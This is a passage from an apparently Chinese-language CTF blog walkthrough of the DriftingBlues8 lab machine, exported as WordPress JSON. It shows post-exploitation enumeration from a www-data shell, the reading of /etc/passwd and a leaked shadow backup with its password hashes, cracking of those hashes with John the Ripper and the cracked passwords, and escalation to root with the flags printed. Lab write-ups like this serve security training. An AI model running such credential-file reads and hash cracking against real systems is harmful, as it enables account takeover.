..\n-rwxrwxrwx  1 www-data www-data    567 May 28  2018 .bowerrc\n-rwxrwxrwx  1 www-data www-data    129 May 28  2018 .editorconfig\n-rwxrwxrwx  1 www-data www-data     80 May 28  2018 .env.example\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 .github\n-rwxrwxrwx  1 www-data www-data     35 May 28  2018 .gitignore\n-rwxrwxrwx  1 www-data www-data    301 May 28  2018 .travis.yml\n-rwxrwxrwx  1 www-data www-data   5526 May 28  2018 CODE_OF_CONDUCT.md\n-rwxrwxrwx  1 www-data www-data   2876 May 28  2018 CONTRIBUTING.md\ndrwxrwxrwx  4 www-data www-data   4096 May 28  2018 Documentation\n-rwxrwxrwx  1 www-data www-data  35147 May 28  2018 LICENSE\n-rwxrwxrwx  1 www-data www-data   3356 May 28  2018 README.md\n-rwxrwxrwx  1 www-data www-data  20701 May 28  2018 acknowledge_license_cert.html\n-rwxrwxrwx  1 www-data www-data  19560 May 28  2018 acl_setup.php\n-rwxrwxrwx  1 www-data www-data  48330 May 28  2018 acl_upgrade.php\n-rwxrwxrwx  1 www-data www-data   4988 May 28  2018 admin.php\n-rwxrwxrwx  1 www-data www-data   3805 May 28  2018 bower.json\n-rwxrwxrwx  1 www-data www-data   6102 May 28  2018 build.xml\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 ccdaservice\ndrwxrwxrwx  4 www-data www-data   4096 May 28  2018 ccr\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 ci\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 cloud\ndrwxrwxrwx  7 www-data www-data   4096 May 28  2018 common\n-rwxrwxrwx  1 www-data www-data   3301 May 28  2018 composer.json\n-rwxrwxrwx  1 www-data www-data 265675 May 28  2018 composer.lock\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 config\ndrwxrwxrwx 11 www-data www-data   4096 May 28  2018 contrib\n-rwxrwxrwx  1 www-data www-data    108 May 28  2018 controller.php\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 controllers\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 custom\n-rwxrwxrwx  1 www-data www-data   3995 May 28  2018 docker-compose.yml\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 entities\ndrwxrwxrwx  8 www-data www-data   4096 May 28  2018 gacl\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 images\n-rwxrwxrwx  1 www-data www-data    901 May 28  2018 index.php\ndrwxrwxrwx 32 www-data www-data   4096 May 28  2018 interface\n-rwxrwxrwx  1 www-data www-data   5381 May 28  2018 ippf_upgrade.php\ndrwxrwxrwx 25 www-data www-data   4096 May 28  2018 library\ndrwxrwxrwx  3 www-data www-data   4096 May 28  2018 modules\ndrwxrwxrwx  3 www-data www-data   4096 May 28  2018 myportal\ndrwxrwxrwx  4 www-data www-data   4096 May 28  2018 patients\ndrwxrwxrwx  6 www-data www-data   4096 May 28  2018 phpfhir\ndrwxrwxrwx 10 www-data www-data   4096 May 28  2018 portal\ndrwxrwxrwx  5 www-data www-data   4096 May 28  2018 public\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 repositories\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 services\n-rwxrwxrwx  1 www-data www-data  40570 May 28  2018 setup.php\ndrwxrwxrwx  3 www-data www-data   4096 May 28  2018 sites\ndrwxrwxrwx  2 www-data www-data   4096 May 28  2018 sql\n-rwxrwxrwx  1 www-data www-data   4650 May 28  2018 sql_patch.php\n-rwxrwxrwx  1 www-data www-data   5375 May 28  2018 sql_upgrade.php\ndrwxrwxrwx 15 www-data www-data   4096 May 28  2018 templates\ndrwxrwxrwx  5 www-data www-data   4096 May 28  2018 tests\ndrwxrwxrwx 34 www-data www-data   4096 May 28  2018 vendor\n-rwxrwxrwx  1 www-data www-data   2119 May 28  2018 version.php\n-rwxrwxrwx  1 www-data www-data  14394 Apr 25  2021 wordlist.txt\n(remote) www-data@driftingblues:\/var\/www\/html$ cd \/home\n(remote) www-data@driftingblues:\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 root    root    4096 Apr 25  2021 .\ndrwxr-xr-x 18 root    root    4096 Apr 25  2021 ..\ndrwx------  2 clapton clapton 4096 Apr 25  2021 clapton\n(remote) www-data@driftingblues:\/home$ cd clapton\/\nbash: cd: clapton\/: Permission denied\n(remote) www-data@driftingblues:\/home$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\n(remote) www-data@driftingblues:\/home$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nmysql:x:105:112:MySQL Server,,,:\/nonexistent:\/bin\/false\nclapton:x:1000:1000:,,,:\/home\/clapton:\/bin\/bash\n(remote) www-data@driftingblues:\/home$ \/usr\/sbin\/getcap -r \/dev\/null<\/code><\/pre>\n<p>\u5c1d\u8bd5\u624b\u52a8\u67e5\u627e\u4e00\u4e0b\u76f8\u5173\u76ee\u5f55\uff0c\u5b9e\u5728\u4e0d\u884c\u53ea\u80fd\u5c1d\u8bd5\u4e0a\u4f20<code>linpeas.sh<\/code>\u548c<code>pspy64<\/code>\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@driftingblues:\/home$ cd \/\n(remote) www-data@driftingblues:\/$ ls -la\ntotal 65\ndrwxr-xr-x  18 root root  4096 Apr 25  2021 .\ndrwxr-xr-x  18 root root  4096 Apr 25  2021 ..\nlrwxrwxrwx   1 root root     7 Apr 25  2021 bin -&gt; usr\/bin\ndrwxr-xr-x   4 root root  1024 Apr 25  2021 boot\ndrwxr-xr-x  17 root root  3240 Apr 13 02:22 dev\ndrwxr-xr-x  73 root root  4096 Apr 13 02:22 etc\ndrwxr-xr-x   3 root root  4096 Apr 25  2021 home\nlrwxrwxrwx   1 root root    33 Apr 25  2021 initrd.img -&gt; boot\/initrd.img-4.19.0-16-686-pae\nlrwxrwxrwx   1 root root    33 Apr 25  2021 initrd.img.old -&gt; boot\/initrd.img-4.19.0-16-686-pae\nlrwxrwxrwx   1 root root     7 Apr 25  2021 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root root     9 Apr 25  2021 lib64 -&gt; usr\/lib64\nlrwxrwxrwx   1 root root    10 Apr 25  2021 libx32 -&gt; usr\/libx32\ndrwx------   2 root root 16384 Apr 25  2021 lost+found\ndrwxr-xr-x   3 root root  4096 Apr 25  2021 media\ndrwxr-xr-x   2 root root  4096 Apr 25  2021 mnt\ndrwxr-xr-x   2 root root  4096 Apr 25  2021 opt\ndr-xr-xr-x 135 root root     0 Apr 13 02:22 proc\ndrwx------   3 root root  4096 Apr 25  2021 root\ndrwxr-xr-x  18 root root   540 Apr 13 02:22 run\nlrwxrwxrwx   1 root root     8 Apr 25  2021 sbin -&gt; usr\/sbin\ndrwxr-xr-x   2 root root  4096 Apr 25  2021 srv\ndr-xr-xr-x  13 root root     0 Apr 13 02:21 sys\ndrwxrwxrwt   2 root root  4096 Apr 13 02:22 tmp\ndrwxr-xr-x  12 root root  4096 Apr 25  2021 usr\ndrwxr-xr-x  12 root root  4096 Apr 25  2021 var\nlrwxrwxrwx   1 root root    30 Apr 25  2021 vmlinuz -&gt; boot\/vmlinuz-4.19.0-16-686-pae\nlrwxrwxrwx   1 root root    30 Apr 25  2021 vmlinuz.old -&gt; boot\/vmlinuz-4.19.0-16-686-pae\n(remote) www-data@driftingblues:\/$ cd opt\n(remote) www-data@driftingblues:\/opt$ ls -la\ntotal 8\ndrwxr-xr-x  2 root root 4096 Apr 25  2021 .\ndrwxr-xr-x 18 root root 4096 Apr 25  2021 ..\n(remote) www-data@driftingblues:\/opt$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/chfn\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/newgrp\n\/usr\/bin\/umount\n\/usr\/bin\/chsh\n(remote) www-data@driftingblues:\/opt$ find \/ -writable  -type f 2&gt;\/dev\/null\n\/var\/www\/html\/interface\/billing\/era_payments.php\n\/var\/www\/html\/interface\/billing\/billing_process.php\n\/var\/www\/html\/interface\/billing\/sl_receipts_report.php\n\/var\/www\/html\/interface\/billing\/sl_eob_help.php\n\/var\/www\/html\/interface\/billing\/ub04_form.php\n........\n(remote) www-data@driftingblues:\/$ ss -tulnp                    \nNetid            State             Recv-Q            Send-Q          Local Address:Port                      Peer Address:Port\nudp              UNCONN            0                 0               0.0.0.0:68                              0.0.0.0:*\ntcp              LISTEN            0                 80              127.0.0.1:3306                          0.0.0.0:*\ntcp              LISTEN            0                 128             *:80                                    *:*     <\/code><\/pre>\n<p>\u540e\u9762\u8fd8\u5728\u5176\u4ed6\u76ee\u5f55\u770b\u4e86\uff0c\u4f46\u662f\u6ca1\u53d1\u73b0\u6709\u7528\u7684\uff0c\u5c1d\u8bd5\u4e0a\u4f20<code>linpeas.sh<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533077.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533077.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413151733762\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5b58\u5728<code>shodaw<\/code>\u7684\u5907\u4efd\u6587\u4ef6\uff0c\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@driftingblues:\/tmp$ cd \/var\/backups\/\n(remote) www-data@driftingblues:\/var\/backups$ ls -la\ntotal 28\ndrwxr-xr-x  2 root root  4096 Apr 13 02:22 .\ndrwxr-xr-x 12 root root  4096 Apr 25  2021 ..\n-rw-r--r--  1 root root 13873 Apr 25  2021 apt.extended_states.0\n-rw-r--r--  1 root root   943 Apr 25  2021 shadow.backup\n(remote) www-data@driftingblues:\/var\/backups$ cat shadow.backup \nroot:$6$sqBC8Bk02qmul3ER$kysvb1LR5uywwKRc\/KQcmOMALcqd0NhHnU1Wbr9NRs9iz7WHwWqGkxKYRhadI3FWo3csX1BdQPHg33gwGVgMp.:18742:0:99999:7:::\ndaemon:*:18742:0:99999:7:::\nbin:*:18742:0:99999:7:::\nsys:*:18742:0:99999:7:::\nsync:*:18742:0:99999:7:::\ngames:*:18742:0:99999:7:::\nman:*:18742:0:99999:7:::\nlp:*:18742:0:99999:7:::\nmail:*:18742:0:99999:7:::\nnews:*:18742:0:99999:7:::\nuucp:*:18742:0:99999:7:::\nproxy:*:18742:0:99999:7:::\nwww-data:*:18742:0:99999:7:::\nbackup:*:18742:0:99999:7:::\nlist:*:18742:0:99999:7:::\nirc:*:18742:0:99999:7:::\ngnats:*:18742:0:99999:7:::\nnobody:*:18742:0:99999:7:::\n_apt:*:18742:0:99999:7:::\nsystemd-timesync:*:18742:0:99999:7:::\nsystemd-network:*:18742:0:99999:7:::\nsystemd-resolve:*:18742:0:99999:7:::\nmessagebus:*:18742:0:99999:7:::\nsystemd-coredump:!!:18742::::::\nmysql:!:18742:0:99999:7:::\nclapton:$6$\/eeR7\/4JGbeM7nwc$hANgsvO09hCCMkV5HiWsjTTS7NMOZ4tm8\/s4uzyZxLau2CSX7eEwjgcbfwcdvLV.XccVW5QuysP\/9JBjMkdXT\/:18742:0:99999:7:::<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7834\u89e3\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues8]\n\u2514\u2500$ john hash.txt -w=\/usr\/share\/wordlists\/rockyou.txt \nUsing default input encoding: UTF-8\nLoaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256\/256 AVX2 4x])\nCost 1 (iteration count) is 5000 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\ndragonsblood     (clapton)     \n1g 0:00:05:10 3.76% (ETA: 05:38:26) 0.003223g\/s 2005p\/s 2721c\/s 2721C\/s makz23..maimuni\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession aborted<\/code><\/pre>\n<h3>\u5207\u6362clapton\u7528\u6237<\/h3>\n<pre><code class=\"language-bash\">su clapton\ndragonsblood<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533078.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533078.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413152658760\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\"># user.txt\n96716B8151B1682C5285BC99DD4E95C2<\/code><\/pre>\n<p>\u5c1d\u8bd5\u540e\u53f0\u7206\u7834\u4e00\u4e0b\uff0c\u7136\u540e\u5206\u6790\u4e00\u4e0b\u8fd9\u4e2a\u7a0b\u5e8f\uff1a<\/p>\n<pre><code class=\"language-c\">\/\/ main.c\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  char buffer[100]; \/\/ [esp+0h] [ebp-6Ch]\n  int *v5; \/\/ [esp+64h] [ebp-8h]\n\n  v5 = &amp;argc;\n  strcpy(buffer, argv[1]);\n  return puts(&quot;hahaha silly hacker!&quot;);\n}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533079.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533079.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413153117029\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0d\u5b58\u5728\u7cfb\u7edf\u51fd\u6570\u3002\u3002\u3002\u3002\u96be\u9053\u6709\u5565\u5965\u79d8\uff1f<\/p>\n<pre><code class=\"language-bash\">(remote) clapton@driftingblues:\/home\/clapton$ .\/waytoroot -h\nhahaha silly hacker!<\/code><\/pre>\n<p>\u989d\uff0c\u540e\u9762\u7206\u7834\u51fa\u6765\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues8]\n\u2514\u2500$ john hash.txt -w=wordlist1.txt                   \nUsing default input encoding: UTF-8\nLoaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256\/256 AVX2 4x])\nRemaining 1 password hash\nCost 1 (iteration count) is 5000 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\n0g 0:00:00:00 DONE (2024-04-13 03:29) 0g\/s 1810p\/s 1810c\/s 1810C\/s sfg365..sfdsfe\nSession completed. \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues8]\n\u2514\u2500$ john hash.txt -w=wordlist.txt \nUsing default input encoding: UTF-8\nLoaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256\/256 AVX2 4x])\nRemaining 1 password hash\nCost 1 (iteration count) is 5000 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\n.:.yarak.:.      (root)     \n1g 0:00:00:16 DONE (2024-04-13 03:29) 0.05892g\/s 3454p\/s 3454c\/s 3454C\/s kruimel..gamess\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<p>\u83b7\u5f97rootshell\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) clapton@driftingblues:\/home\/clapton$ su -l root\nPassword: \nroot@driftingblues:~# pwd\n\/root\nroot@driftingblues:~# ls -la\ntotal 20\ndrwx------  3 root root 4096 Apr 25  2021 .\ndrwxr-xr-x 18 root root 4096 Apr 25  2021 ..\n-rw-------  1 root root  181 Apr 25  2021 .bash_history\ndrwx------  3 root root 4096 Apr 25  2021 .gnupg\n-rw-r--r--  1 root root   32 Apr 25  2021 root.txt\nroot@driftingblues:~# cat root.txt \nE8E7040D825E1F345A617E0E6612444Aroot@driftingblues:~# cat .bash_history \nls\nbash logdel2\nrm logdel2\nshutdown -h now\ncd \/home\/clapton\nls\nsu clapton\nclear\nls\ncd \/root\nwget 192.168.2.43:81\/hroot.txt\nmv hroot.txt root.txt\nclear\ncat root.txt \nshutdown -h now\nroot@driftingblues:~# cd .gnupg\/\nroot@driftingblues:~\/.gnupg# ls -la\ntotal 12\ndrwx------ 3 root root 4096 Apr 25  2021 .\ndrwx------ 3 root root 4096 Apr 25  2021 ..\ndrwx------ 2 root root 4096 Apr 25  2021 private-keys-v1.d<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>driftingblues8 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20.10.7 &#8212; -A  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-544","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/544","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=544"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/544\/revisions"}],"predecessor-version":[{"id":545,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/544\/revisions\/545"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=544"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=544"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=544"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}